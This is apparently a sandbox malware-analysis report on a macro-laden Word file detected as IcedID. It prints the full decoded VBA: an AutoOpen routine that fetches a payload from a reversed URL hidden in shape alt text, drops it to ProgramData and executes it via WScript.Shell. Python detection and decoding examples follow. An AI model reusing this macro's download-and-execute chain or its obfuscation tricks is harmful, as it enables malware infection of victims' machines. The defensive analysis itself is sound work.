Verdict: MALICIOUS
Risk score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). Document contains a VBA project; VBA macros present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: Set nzcgf = CreateObject("Script" + hSCIM)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape

  Every URL in this list is an OOXML/DrawingML XML namespace URI that Word writes into ordinary documents, not a network indicator. The macro's actual download URL is not among them: it is stored reversed in the first shape's alternative text and only reassembled at run time (see DvsXy(1) and Reverse(tsAQk) in the extracted source below).
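The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC, as an added example (this is not the analyzer's own code): it scans a raw VBA stream for the auto-exec and execution tokens listed in the heuristic description, in both ASCII and UTF-16LE because VBA project streams store names in both forms, and reports a hit only when one token of each class is present. The token lists are copied from the description above; the stream bytes and source snippets are constructed for the demonstration.

```python
"""Re-implementation of the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule.
Added example, not the analyzer's code; token lists from the heuristic text."""
import re
from typing import Optional

AUTOEXEC_TOKENS = (
    "Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open", "Auto_Close", "AutoClose",
)
EXEC_TOKENS = (
    "Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe", "URLDownloadToFile",
    "WinHttp", "XMLHTTP", "ADODB.Stream", "ShellExecute", "ExecuteExcel4Macro",
)


def _token_patterns(token: str):
    """One case-insensitive pattern per encoding. VBA project streams carry names
    both as MBCS (ASCII here) and as UTF-16LE, so both forms are searched."""
    return [
        re.compile(re.escape(token.encode("ascii")), re.IGNORECASE),
        re.compile(re.escape(token.encode("utf-16-le")), re.IGNORECASE),
    ]


def find_tokens(stream: bytes, tokens) -> list:
    """Return the tokens that occur anywhere in the stream, in list order."""
    hits = []
    for tok in tokens:
        if any(p.search(stream) for p in _token_patterns(tok)):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream: bytes) -> Optional[dict]:
    """Fire only when an auto-exec entry point AND an execution token co-occur.
    Either class alone returns None, matching the rule's description."""
    autoexec = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    if autoexec and execs:
        return {"autoexec": autoexec, "exec": execs}
    return None


# Constructed stream: an ASCII entry point, an ASCII CreateObject and a UTF-16LE
# ProgID, the way a p-code-only module might carry them with no source available.
SAMPLE_STREAM = (
    b"\x01\x16\x03\x00Attribute VB_Name = \"ThisDocument\"\x00"
    b"Document_Open\x00"
    b"CreateObject\x00"
    + "MSXML2.serverXMLHTTP".encode("utf-16-le")
)
# Lines taken from the decoded source of this sample: the split "cript.shell"
# literal still matches "Shell" because the scan is a case-insensitive substring match.
SAMPLE_SOURCE = (
    b'Sub AutoOpen()\r\nSet nzcgf = CreateObject("Script" + hSCIM)\r\n'
    b'Set sbfbU = CreateObject(MBZYi + "cript.shell")\r\n'
)
# Constructed negatives: one class of token each, so the rule must stay silent.
ONLY_AUTOEXEC = b"Sub Auto_Open()\r\nMsgBox 1\r\nEnd Sub"
ONLY_EXEC = b"Sub Helper()\r\nShell \"calc\"\r\nEnd Sub"

if __name__ == "__main__":
    for name, data in [("SAMPLE_STREAM", SAMPLE_STREAM), ("SAMPLE_SOURCE", SAMPLE_SOURCE),
                       ("ONLY_AUTOEXEC", ONLY_AUTOEXEC), ("ONLY_EXEC", ONLY_EXEC)]:
        print(name, pcode_autoexec_exec(data))
```

Substring matching is deliberately loose: it catches the split-string trick used by this sample ("ws" + "cript.shell"), at the cost of firing on benign identifiers that merely contain a token, which is why the rule is paired with an auto-exec token rather than used on its own.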
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11974 bytes |

SHA-256 (macros.bas): 5bab1efeae6dc88875b64f805f8daba1a42150348d7ab81fd7c70222569c5c89

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sksSJ"
Sub Odolo(kVQgh, Optional ByVal cREuZ As String = "c:\programdata\Cxvdv.txt", Optional ByVal hSCIM As String = "ing.FileSystemObject")
' Enviably scheme infectious celebrities
' Teleworking regrowth dance wisely
' Lira
' Gambia snows
' Hotpot criminality
' Girdled
' Choose eyeglass enveloping pruritus injury mush
' Ribald equalities
' Longlasting fells fowl
' Interpretative deviants stimulates dreams coursing
' Gulped carriageway aerobes
' Hopes scarp massaged biz amplifier
' Overrule enriched comeliness shrew nymph omnipresence
' Eyeshadow whipped closed mestizo choices
' Atone juxtaposition verdicts cirrhosis vibrational
' Serviceman magnetically pranksters eschew acute
' Hussy chairlift eggheads
' Sloths purportedly juniors applicants shamanistic
Set nzcgf = CreateObject("Script" + hSCIM)
' Galvanometer supplicant windy
' Super fried
' Spurious enlargement cluster crate safeness
' Tendentiously yens sos
' Blurred
' Module finitely drays
Set yzOpB = nzcgf.CreateTextFile(cREuZ)
' Blister straightest
' Tutu
' Bothersome invigorated
' Preambles premised gallant mingled
yzOpB.WriteLine kVQgh
' Jocularity matting detains
' Maturely cupolas nogging aerospace
' Luminaries scotch caymans
' Basest
' Quirkier queerly
' Reasonable plagues watts
' Payday comparison
yzOpB.Close
' Mitosis
' Bewilderment elliptic
' Stapling
' Gingers unawares asparagus rescheduled
' Bowsprit debase baddy satinwood fatherinlaw smother
' Interchanged consanguineous rooster
' Forgo bacon untutored quadratic
' Destruction fleshy technicality quartet
' Andrew permissibility grafting
' Quince outskirts
' Lesbians curve
' Incumbent resistive niggling regularities vacancy
' Stink rebuking
' Indispensability infidelity horrified manors symbolical
' Finitely
' Thanks terser spotlessness linearly driers barrows cunnilingus
' Assailant begs aconite
' Speediest wapitis
' Inflicter grille apocalypse deportees
' Candle parlour statuses builds oppositional lukewarm
' Pecuniary vests
' Chloride
' Cooks
' Concertina dissimulation fifthly bursars
' Sorrows obscenely
' Verge potion airgun bubblegum swabbed
' Apologist redirecting beat
' Semitics permute constabulary
' Volumetric dirt ensemble
' Elves impudently gimmick default
' Topographic
' Soaker termly tantalise escarpment
' Multiplexes ocular perfumed hierarch auditioned
' Ell resonators citizen
' Rudder fruitless
' Irreverence squabbled evacuating
' Befuddling coronations boers unfitness maps presidential
' Serials buries ooh alcoholics
End Sub
' Requiems
' Coriander
' Amendable unit
' Snaffle lurk philologist deferment vorticity
' Lustily husked trait irritable plough
Sub AutoOpen()
' Tanneries tarpaulins decoying steeple orientates costefficient
' Gracing reassured consort infelicities mercury coxcombs
' Unhand
' Romped decaffeinate retyped innards typists
' Uncomfortableness expanses processed timehonoured redistributing issuable
' Culprits spectroscope
' Flaming
' Undeniably neptune scowl
' Spinster comity reconsult peregrine funnels
' Salesperson backlogs unfold shrubberies bitterness
' Tailing dressmaking appals fiercer
' Remotest reserves unawares gusts ejects
' Lesions garotte squeakiest microorganisms memorandums
' Chaotically engulfed
' Landscaping foxes hale
' Demurs
' Valency
' Ampersand gabble purses stored
' Geopolitical troughs inaccessibility
' Cleaves familiarising baffler flours
' Semester sunspot gardens extravaganza
' Insolvencies
' Incinerators moodily
' Mouthing athletically gloved retaking
' Constitutively
' Trudges stigma symptomless liberality
' Intensively bacillus solves fading overhaul
' Trickily luscious remembrance infects astonishment
' Oversized refuels subordinate katydid exercising
Dim GApMc As New LueRV
' Effeminacy terse tricked
' Fullscale smelliest ledge
' Chandelier
' Distilleries
' Cry kindle interplay oration pomp
' Wags dip annexing annihilation maverick incongruities
' Nonsmokers pats creeper trenches ballbearings ascertained
kVQgh = GApMc.beOHg("MSXML2.serverXMLHTTP")
' Convocations gad underworld
' Mutilates jubilate instability
' Lad sobs expectations
' Boyish
' Participles kite
' Entombment lachrymose lankier borders fractal bumbles
Odolo PJwhh(kVQgh)
' Sheepskins
' Hayfever seaworthy futon
' Soandso traumatise fixed warm
' Goulash solecisms
' Anorexia freshness banger
' Silicate birds
' Trilobite romany maliciousness spars hayfever
' Sailcloth
' Empowered
' Holocausts predestined downcast
OHsES DvsXy(0) + "vr32 c:\programdata\Cxvdv.txt", "ws"
End Sub
Function fTGBu(sSToB, gZNTr)
' Urbanites painted sociologists incompressible
' Disembarking dying subventions needlecraft
' Hardship sportsmen
' Illtempered thieved
' Botulism biotechnologist undertook descents
fTGBu = Split(sSToB, gZNTr)
End Function
Attribute VB_Name = "ZDuaI"
' Neurological fluctuated improvident examiners
' Bamboozled watercolourists
' Billy authenticator
' Resolvent shade unconstrained regretted
' Assonance credentials refinanced
Function PJwhh(Rcfup)
' Wast subsoil rediscovering pallmall sabbath aphelion
' Clogged wayside lifebelt
' Videos riveter expands
' Fresher geomorphology untruth
' Tremblingly bream dwelling belatedness
PJwhh = StrConv(Rcfup, vbUnicode)
' Flutes anna
' Purifier babas frittering sickbed
' Parches furtherance harmony swearers officer
' Tamely rescheduling securing fuddle
' Voodoo steppes spoilt
' Weightlifters fuzz dextral
End Function
' Slumps prospects mildness
' Gongs replacements longlost soandso
' Reallocation cobra benefice ported
' Decongestants motorcade repudiate unmodified
' Refund ransacked visit
' Complainingly violate
Function lzXjd()
' Prejudged elephant beaked accusingly placates
' Orthodontist grands
' Biological chomping notoriously
' Motioned isomorphic conference follower snowing
' Caller gardeners unprecedentedly skirts
' Easement gastric
' Snoozing mapped traditionally
' Shallots stealthy correctional
' Looms ontological cagy proficiency
With ActiveDocument.shapes(1)
lzXjd = .AlternativeText
End With
End Function
' Sibilant steeds
' Chihuahua whiles deltoid coiling
' Snakeskin loved
' Consequence innovated
' Relativity wash coordinators shiftily
Function DvsXy(zOuhh)
' Detaching encampments weaker
' Tussling exclusive property
' Rashes toucher ranges
' Enshrining subcontract
' Referenced realty bisected
' Unethically debts
' Nights
' Repackage externals trident harmless
' Narcosis snowdrops wellgrounded
' Stager
' Projections redo homed riffled
pHIDY = lzXjd()
BgvfY = fTGBu(pHIDY, "###")
DqZYN = BgvfY(zOuhh)
DvsXy = DqZYN
End Function
Attribute VB_Name = "LueRV"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Usury
' Acetal traitorous gruffness turnovers epidermis
' Scene spoonful spared
' Odometer stolen november billposters regenerates overturns
' Vicepresident incas purvey
' Channelled riveted matriculation shiftily coital headlights protected
Function beOHg(otgPh)
' Crestfallen rips deposed municipality
' Playboys birdwatching
' Diplomatic beast completeness
' Orthogonality godmother tutors subscribed crisis
' Imminence encumber
Dim eSlYS As Object
' Conception cowboys thanks
' Lorries
' Superficial fedup any
' Emigres streak
' Iota saner polytechnics exchangeable
' Blackberries chartists overgrowth freons
' Hectically worming vaguest traverse malays
' Guffaw
' Pinpointing ripostes corresponded accredit implant match
' Misconceptions continue curdling buffet
' Exhuming presume forsakes assemble
' Dealership sneakier
' Approve plunging
' Dreary deferentially trouncing cargo
' Siesta large softening understands encases
Set eSlYS = CreateObject(otgPh)
' Instigated shielded values
' Pacemakers hermitage
' Vote
' Quorate meltdown coastlands dabbing
' Whodunnit rattles
' Funk differing lenses rhapsodic
' Hesitating naturally slyer
' Hires
' Mode
' Swoons licensing hostile thematically
' Durations hoodlum pub
' Singable hedges seafarer
' Tributes incas translations
' Penthouse spectroscopy sociably
' Professes probation
' Hubristic
' Centre celebrities
' Bareback holier commission swerving portrayals
' Chopin springbok mutters unrehearsed
tsAQk = DvsXy(1)
' Reconsider ravishes zenith
' Phonology adaptivity strikes
' Distrusted inimitably overdone befog stringencies assessment achingly
' Gratification parametrically spurred eviction
' Shrewd undecided lengthwise
' Ovations
' Cyclically equalities tracing negating
eSlYS.Open "GET", Reverse(tsAQk), False
' Cockiest
' Ripping conjugating reseeding wallpaper
' Tinnitus
' Hallowed sections elocution mildews pogrom grittiest
' Vivacious boxers hygienist
eSlYS.Send
' Lifeboatmen desolate teeny
' Unities exempting divergence twined
' Impacted extrasolar dramatisations
' Repents medicate
' Blondest aura rites superposition delays
' Audits recursions blinds sector
' Largest agronomy
beOHg = eSlYS.responsebody
End Function
Attribute VB_Name = "XuUux"
Sub OHsES(NoGpK, MBZYi)
' Harems patois finishes compressed
' Housebound moron displaces brittleness
' Grovelled chuck dripping decadence
' Chromosomes rendition preside exodus
Set sbfbU = CreateObject(MBZYi + "cript.shell")
' Backstreets workforces sobbed able
' Skipper griped hackneyed severer crenellated plectrums dubbing
' Ranks insubstantial sulky
' Stouter expensive cabbages omelettes punky
' Inactivated crucial pantomimes nosiness bailing defaced
' Indelicacy slav
' Narrators bookcase view occluded
' Dyestuffs disquieting unexcited
' Proneness firelight bugging candies
' Northbound
' Colonialists appraise
' Domesticated point mountings
' Envelopers semantically compound masterminded gravitationally shovelled
' Reverting
' Stockinged pooh prudence voluptuousness promotional
' Phonologically magnificently televise smocks rasp
' Valuing
' Burbles
' Domes countdown quartered spellbinding misfortune idealism
' Epidermal potentate
' Proverbial adjure vertebrates preparative
' Speculative
' Combativeness tightening
' Whelp flue deterring auditors
' Cobbles vacuum spinner transliterate chump
' Disorient organises fascias orphans newcomer
' Gamy
' Definitional nadir
' Hitchhike communism
' Droppings fitfully grapples incursion hotdogs monopolist flattish stirrup
' Reaches trilobites bicarbonate
' Weighted campanologist aspirational endears
' Impalpable resilient
' Devisal stingier sportive
' Hungrily acquiescing replying adultery sightings
' Addictiveness moderations wholesome
' Radiograph secedes
' Recordings passers racket
' Plushy voiced
' Brides injokes
' Baptism commit sahib stratospherically
' Stayers haggler briefcase
' Airfields plastic prevarication gorgeous incalculably
' Isothermal supposing serf
' Potency shamefacedly
sbfbU.exec NoGpK
' Perished deprivation patriot
' Nest swerving moot titanium strut smithy
' Rebuttals highheeled dendrochronology diabolically vegetate indicated quartets
' Clothespegs reparations culpable
' Vocalist
' Acutest mellows pernicious pancakes
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes |

SHA-256 (vbaProject_00.bin): c0e35ee89dceec01ce93f7324aae169b8732803049a320f9aca5adb12c1db3fe
Detection: ClamAV Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely (the analyzer's own assessment of this stream; note that the decoded source above splits the "Scripting.FileSystemObject" and "WScript.Shell" ProgIDs across string concatenations, stores the download URL reversed, and pads every routine with junk comments, so treat this field with caution)
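The decoded source shows the whole chain: AutoOpen reads the first shape's AlternativeText (lzXjd), splits it on "###" (fTGBu / DvsXy), reverses element 1 to obtain the download URL (Reverse in class module LueRV), fetches it with MSXML2.serverXMLHTTP (beOHg), writes the response to c:\programdata\Cxvdv.txt through Scripting.FileSystemObject (Odolo), and runs element 0 + "vr32 c:\programdata\Cxvdv.txt" through WScript.Shell (OHsES). The Python below is an added example, not part of this report or of the sample: it pulls the alternative text out of word/document.xml (the descr attribute of wp:docPr for DrawingML shapes, the alt attribute of v:shape for legacy VML shapes, which is where Word persists AlternativeText) and applies the same split-and-reverse to recover the URL and launcher command statically. The document XML and the alt-text value are constructed; the report does not show the real alt text, and "regs" for element 0 is an assumed value chosen only to illustrate the concatenation.

```python
"""Recover the URL and launcher string that the extracted macro reads from the
first shape's AlternativeText. Added example; input XML and values are constructed."""
import zipfile
import xml.etree.ElementTree as ET

# Word stores a shape's alternative text in one of two places.
NS_WP = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"  # <wp:docPr descr="">
NS_VML = "urn:schemas-microsoft-com:vml"                                            # <v:shape alt="">

DELIMITER = "###"                                   # fTGBu(pHIDY, "###") in DvsXy
COMMAND_SUFFIX = "vr32 c:\\programdata\\Cxvdv.txt"  # literal appended to DvsXy(0) in AutoOpen


def extract_alt_texts(document_xml: str) -> list:
    """Return every alternative-text string found in a word/document.xml body."""
    root = ET.fromstring(document_xml)
    texts = []
    for el in root.iter():
        if el.tag == "{%s}docPr" % NS_WP and el.get("descr"):
            texts.append(el.get("descr"))
        elif el.tag == "{%s}shape" % NS_VML and el.get("alt"):
            texts.append(el.get("alt"))
    return texts


def decode_config(alt_text: str) -> dict:
    """Mirror DvsXy/Reverse: split on ###, element 1 is the URL stored reversed
    (Reverse() trims first, so strip before reversing), element 0 is the command prefix."""
    parts = alt_text.split(DELIMITER)
    if len(parts) < 2:
        raise ValueError("alt text is not a %s-delimited config" % DELIMITER)
    url = parts[1].strip()[::-1]
    command = parts[0] + COMMAND_SUFFIX
    return {"parts": parts, "url": url, "command": command}


def recover_from_docx(path: str) -> list:
    """Open a .docx (zip), read word/document.xml and decode every ###-delimited alt text."""
    with zipfile.ZipFile(path) as z:
        xml = z.read("word/document.xml").decode("utf-8")
    return [decode_config(t) for t in extract_alt_texts(xml) if DELIMITER in t]


# Constructed document.xml: one inline drawing whose descr holds an assumed config.
# "regs" is an assumed element 0; the URL is a reversed placeholder, not a real indicator.
SAMPLE_DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:wp="%s">' % NS_WP
    + '<w:body><w:p><w:r><w:drawing><wp:inline>'
    '<wp:docPr id="1" name="Picture 1" descr="regs###/daolnwod/dilavni.elpmaxe//:ptth"/>'
    '</wp:inline></w:drawing></w:r></w:p></w:body></w:document>'
)

if __name__ == "__main__":
    for alt in extract_alt_texts(SAMPLE_DOCUMENT_XML):
        print(decode_config(alt))
```

On a real sample, run recover_from_docx() against the document itself; the recovered URL is the indicator to block and hunt for, and the command string tells you which host binary to expect in the process tree after the drop to c:\programdata\Cxvdv.txt.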